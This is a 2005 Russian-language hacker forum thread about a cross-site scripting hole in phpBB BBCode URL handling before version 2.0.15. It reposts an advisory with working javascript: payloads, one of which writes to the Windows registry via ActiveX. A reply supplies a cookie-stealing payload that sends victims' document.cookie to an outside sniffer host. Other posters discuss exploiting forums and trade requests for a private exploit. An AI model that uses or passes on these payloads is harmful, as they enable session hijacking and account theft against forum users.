Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   phpBB < 2.0.15, BBCODE URL в phpBB (https://forum.antichat.xyz/showthread.php?t=6961)

karapuz 06.06.2005 22:04

phpBB < 2.0.15, BBCODE URL в phpBB
 
http://www.securitylab.ru/55012.html
http://www.securitylab.ru/55013.html

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

Цитата:

[urЛ=javascript://%0ASh=alert(%22CouCou%22); window.close();]Alert box with "CouCou"[/urЛ]
Цитата:

[urЛ=javascript://%0ASh=new%20ActiveXObject (%22WScript.shell%22);Sh.regwrite(%22HKCU %5C%5CQQQQQ%5C%5Cqq%22,%22CouCou %22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/urЛ]
Цитата:

[urЛ=javascript://%0Awindow.opener.document.body. innerHTML=window.opener.document.body.innerHTML. replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27); window.close();]Modify opener page: Paul -> P.A.U.L[/urЛ]
URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.

Rebz 06.06.2005 22:25

Так-с... любить Секлаба!!
Уже в 2-х местах оставил ссылки...

Попрошу больше не писать подобных постов.. Со мной многие согласятся. Нам не нужно тупые копи_пейст новостей секлаба, усёк?

karapuz 06.06.2005 22:38

Rebz, я те че каждый день ссылки кидаю ? и оставил то я их по делу!!!
вроде как ты и не модератор(админ, урцтой перец :D) что бы права качать.
а запостил я потому что ни кто эту тему не обсуждал еще! имхо phpBB многих интересует.


Rebz не надо быть таким "реальным авторитетом форума, подписывающимся за всех"

p.s. вроде я понятно обьяснил...

Rebz 06.06.2005 22:47

вроде бы понятно..
но вижу ты новичок и не и знаешь наших "тёплых" отношений к секлабу.
А про авторитет - это уже не твоё дело =)

(-=util=-) 06.06.2005 23:20

сейчас опять обрушится серия ударов по phpBB =)

CyberHack 08.06.2005 11:26

vo novoe sobitie.davaite sozdaite vidio kak lamanut forum.
pojavilsia novij bag zna4it nobvoe vidio popitajtes sozdat.
ocen bi xotelos posmatret

GreenBear 09.06.2005 17:42

кто тебе это сделать мешает?

KEZ 09.06.2005 19:04

Нунафига с секлаба то

OLIVER 09.06.2005 22:58

Kez ну так выбора же практически нет... По иностранным народ лазить не любит, а из русских он один из лутших, это не реклама это ведь реальность, согласись.
Нужно делать конкуренцию!

Xalegi 10.06.2005 10:11

чтоб посраться можно создать другой топик =)
давайте думайте как это использовать =))))))))))))))

ЗЫ: секурлаб и так читаем... реально.. ссылки сюда можно не выкладывать

Qwazar 10.06.2005 13:33

Нэ эксплорере ничего не сработало.

Pridu_ROCK 10.06.2005 20:19

Люди Alert проходит слегка вот только до меня не как не доходит как вместо alertА подставиь снифер с передачей кукисов :( Помогите плиз...

GreenBear 10.06.2005 20:37

Цитата:

Люди Alert проходит слегка
мда... это как?

Цитата:

вот только до меня не как не доходит как вместо alertА подставиь снифер с передачей кукисов
зависит от форума.
как пример:

Код HTML:

[url="site.ru"style="background:url(javascript:document.location=sniffer.ru+document.cookie;"]clik me[/url]

dolzi 14.06.2005 14:46

phpbb 2.0.15 кстати эксплоитом можно взломать,
я его своим личным эксплоитом ломал

Qwazar 14.06.2005 15:06

О! Напиши пожалуйста эксплоит сюда или в личку, если не жалко.

Rebz 14.06.2005 17:00

шли-шли... выкладывай здесь, блин!) Аттач ещё пока у всех работает))
И давай ссылку где можно скачать!

Morph 15.06.2005 06:35

Странно но ладно.
Проверим реацию.

m0nzt3r 15.06.2005 23:27

уверены что это не будет очередным трояном или еще чем то))

Morph 16.06.2005 06:15

Вот я о том же жду как будут крики там приму меры.

m0nzt3r 16.06.2005 23:36

=)) эй там antares ну что послали тебе сплойт?

FoX's 17.06.2005 00:50

И еще пошли сюда за одно... virus@lightcod.com

Morph 17.06.2005 06:11

все просьбы затираю и пишите в приват.


Время: 21:34